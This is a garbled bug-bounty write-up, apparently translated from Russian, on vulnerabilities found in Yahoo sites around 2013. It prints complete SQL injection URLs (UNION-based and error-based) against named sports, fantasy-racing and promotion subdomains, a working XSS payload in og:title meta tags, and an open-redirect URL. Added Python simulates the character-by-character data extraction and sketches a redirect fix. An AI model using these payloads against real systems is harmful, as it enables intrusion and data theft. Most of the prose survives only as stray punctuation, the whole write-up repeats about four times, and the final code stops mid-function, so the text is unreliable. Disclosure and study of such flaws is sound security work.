ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .

:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.

:
SQLi at * .sports.yahoo.com
SQL . .

. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

, , : " ?!". Yahoo 394 .

. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .

, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928

, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390

- , . - .
XSS at info.yahoo.com
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .

.
, Yahoo. . . , .

.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
SQLi and XSS are off.
, , . , , .

, , , , , -10 Yahoo - Wall of Fame .

- : hackerone.com/4lemon .

PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.

. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
Also:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
(week):
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/stat2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
Notes:
- UNION SELECT: [note lost in extraction].
- The database account is USERNAME@%, i.e. the wildcard-host form.
- @@hostname comes back with 40+ different values. The backend is MySQL.
- Through year=postseason_2013, information_schema was reachable; hex encoding [rest of the note lost].

Walk-through on one of them:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
Only numbers get rendered on that page; a string smuggled in through the UNION shows up as " - ". So the data is pulled out one character code at a time through the numeric column:
union select 1, ord(substr(user(),1,1))/100,1

Reported as:
SQLi at *.sports.yahoo.com
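The extraction trick above, reproduced end to end as an added example (this is not the author's code). A SQLite-backed mock of the playerdistribution handler stands in for the MySQL endpoint, with user() and ord() shimmed in so the page's own payloads run unchanged. The table, the account name sports_ro@% and the exact rendering are assumptions made for the simulation; what the payload itself implies, and what the mock copies, is that the page prints its numeric column as a percentage, which is why ord()/100 lands the character code in plain sight.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the MySQL backend: a tiny table plus shims for the
    MySQL functions the page's payloads call (user(), ord())."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE distribution (driver TEXT, share REAL, week INTEGER)")
    db.executemany("INSERT INTO distribution VALUES (?, ?, ?)",
                   [("driver 48", 0.31, 35), ("driver 24", 0.22, 35), ("driver 18", 0.47, 35)])
    db.create_function("user", 0, lambda: "sports_ro@%")  # assumed account name
    # MySQL: ord('') is 0 and '/' is true division; returning a float keeps '/' true in SQLite too
    db.create_function("ord", 1, lambda s: float(ord(s[0])) if s else 0.0)
    return db


def playerdistribution(db, week):
    """Mock of the vulnerable handler: `week` is pasted into the SQL unquoted, the
    share column is printed as a whole-number percentage, and non-numbers as ' - '."""
    sql = f"SELECT driver, share, week FROM distribution WHERE week = {week}"
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"
    lines = []
    for driver, share, _week in rows:
        cell = f"{round(share * 100)}%" if isinstance(share, (int, float)) else " - "
        lines.append(f"{driver}\t{cell}")
    return "\n".join(lines)


def playerdistribution_fixed(db, week):
    """Same handler with the parameter validated and bound instead of interpolated."""
    try:
        week_int = int(week)
    except (TypeError, ValueError):
        return "error: week must be an integer"
    rows = db.execute("SELECT driver, share FROM distribution WHERE week = ?", (week_int,))
    return "\n".join(f"{driver}\t{round(share * 100)}%" for driver, share in rows)


def find_column_count(page_for, max_cols=10):
    """The 'week=0 union select 1,2,3 -- ' step: grow the column list until the
    database stops rejecting the UNION."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if not page_for(f"0 union select {cols} -- ").startswith("error"):
            return n
    return None


PERCENT_ROW = re.compile(r"^1\t(\d+)%$", re.MULTILINE)


def extract_via_percent(page_for, expr="user()", max_len=64):
    """The 'ord(substr(user(),i,1))/100' step: the i-th character's code rides the
    numeric column and comes back as a percentage; 0% means substr() ran off the end."""
    chars = []
    for i in range(1, max_len + 1):
        page = page_for(f"0 union select 1, ord(substr({expr},{i},1))/100, 1 -- ")
        match = PERCENT_ROW.search(page)
        if match is None:
            raise RuntimeError(f"unexpected page: {page!r}")
        code = int(match.group(1))
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    page_for = lambda week: playerdistribution(db, week)
    print("columns:", find_column_count(page_for))
    print("user():", extract_via_percent(page_for))
    print("fixed handler:", playerdistribution_fixed(db, "0 union select 1,2,3 -- "))
```

The same loop works for any scalar expression (database(), @@hostname, a subselect), which is why a "numbers only" page is not a dead end for an injection.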

Open redirect on m.yahoo.com

After signing in on m.yahoo.com (the note on how to get to this state survives only as the fragment "dark side of reproduce this bug"), you land on this page:
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
( ) Move the existing settings to my Yahoo ID
( ) Ignore the existing settings
( ) Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Replayed through Firebug as a GET request:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
It went through. So the handler most likely reads $_REQUEST rather than $_POST. No XSS here, but the done parameter is used as the redirect target, and it still works with a "broken" ycb:
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED

Yahoo paid $394 for this one.
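The check the handler above lacks, as an added example in Python (not code from the original post or from Yahoo). It assumes the endpoint only ever needs to send a user back to m.yahoo.com and that ycb is a per-session crumb which must match; the allow-list, the default destination and the whole mock handler are assumptions. The "vulnerable" variant encodes what the observations above are consistent with: any HTTP method is accepted, the ycb value is not compared with anything, and done is used verbatim.

```python
from urllib.parse import urlsplit

# Assumption: the only host this endpoint legitimately sends a user to after login.
ALLOWED_HOSTS = {"m.yahoo.com"}
DEFAULT_DONE = "/w/ygo-frontpage/"


def is_safe_done(done: str) -> bool:
    """Accept only same-site targets: a path on this site, or an http(s) URL whose
    host is on the allow-list. Other hosts, protocol-relative '//host',
    'javascript:', 'http:/host' and backslash variants are refused."""
    if not done:
        return False
    cleaned = "".join(ch for ch in done if ch not in "\t\r\n")  # browsers strip these
    try:
        parts = urlsplit(cleaned.strip())
    except ValueError:
        return False
    if parts.scheme or parts.netloc:
        if parts.scheme not in ("http", "https"):
            return False
        return (parts.hostname or "").lower() in ALLOWED_HOSTS
    path = parts.path
    return path.startswith("/") and not path.startswith("//") and "\\" not in path


def merge_submit_vulnerable(method, params, session_crumb):
    """What the observations are consistent with: any method, no crumb check,
    `done` used verbatim."""
    return 302, params.get("done") or DEFAULT_DONE


def merge_submit_fixed(method, params, session_crumb):
    """POST only, crumb must match the session, `done` validated with a safe default."""
    if method != "POST":
        return 405, None
    if params.get("ycb") != session_crumb:
        return 403, None
    done = params.get("done", "")
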